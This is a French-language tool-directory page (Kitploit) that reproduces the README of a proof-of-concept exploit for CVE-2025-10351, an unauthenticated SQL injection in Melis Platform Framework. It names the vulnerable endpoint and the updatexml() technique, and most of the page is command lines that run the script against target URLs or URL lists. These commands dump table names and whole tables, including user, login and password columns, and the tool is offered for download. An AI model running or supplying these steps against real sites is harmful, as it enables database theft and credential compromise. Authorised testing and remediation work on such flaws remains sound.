Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-10351-POC — Exploit pour CVE-2025-10351. Injection SQL sur Melis Platform Framework | Kitploit
Outils/GitHubGitHub/ivansmc/cve-2025-10351-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

Exploit pour CVE-2025-10351. Injection SQL sur Melis Platform Framework

Voir le dépôt
12il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-10351 POC - Exploit d'injection SQL 💉

POC pour CVE-2025-10351 : Une vulnérabilité d'injection SQL non authentifiée affectant un point de terminaison spécifique dans Melis Platform Framework.

status python status


🔗 Références

  • 📄 CVE-2025-10351 sur MITRE
  • 📄 Avertissement Melis Platform sur INCIBE (Institut national de cybersécurité espagnol)

🚀 Description

Ce POC cible une vulnérabilité d'injection SQL basée sur les erreurs non authentifiée sur le point de terminaison :

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

Il utilise updatexml() dans MySQL pour extraire :

  • Noms des tables
  • Noms des colonnes
  • Données de colonnes spécifiques ou de toutes les colonnes

Il détecte également les vecteurs d'injection SQL temporelle possibles pour une exploitation manuelle ultérieure.


🛠️ Prérequis

Installez les dépendances avec :

root@kitploit:~
pip3 install -r requirements.txt

🧪 Utilisation

Vérification de base

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

À partir d'une liste d'URL

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

Extraire tous les noms de tables

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

Extraire tous les noms de colonnes d'une table

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

Extraire toutes les données de toutes les colonnes

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

Extraire des colonnes spécifiques

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

Utilisation d'un proxy avec mode non sécurisé, cookies et mode débogage

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ Options

ArgumentDescription
-uURL cible
-pPort (80, 443, etc.)
-lFichier contenant une liste d'URL
-sTemps d'attente pour les tests temporels (par défaut : 1s)
-atExtraire tous les noms de tables
-tSpécifier le nom de la table
-acExtraire toutes les colonnes d'une table donnée
-cListe de colonnes séparées par des virgules à extraire
--proxyBurp Proxy http://127.0.0.1:8080
--insecureDésactiver les vérifications TLS lors de l'utilisation de connexions proxy
--cookieCookies pour les requêtes d'authentification
--debugMode débogage

📤 Résultat

  • Tables extraites sauvegardées dans tables_extracted.txt
  • Données extraites sauvegardées dans <table_name>_data.txt

⚠️ Avertissement

Ce document est destiné uniquement aux tests de sécurité autorisés et à la remédiation. N'utilisez pas le PoC ou les étapes de reproduction contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'auteur n'est pas responsable d'une mauvaise utilisation.


Fait avec ❤️ par Manuel Iván San Martín Castillo

Télécharger l’outil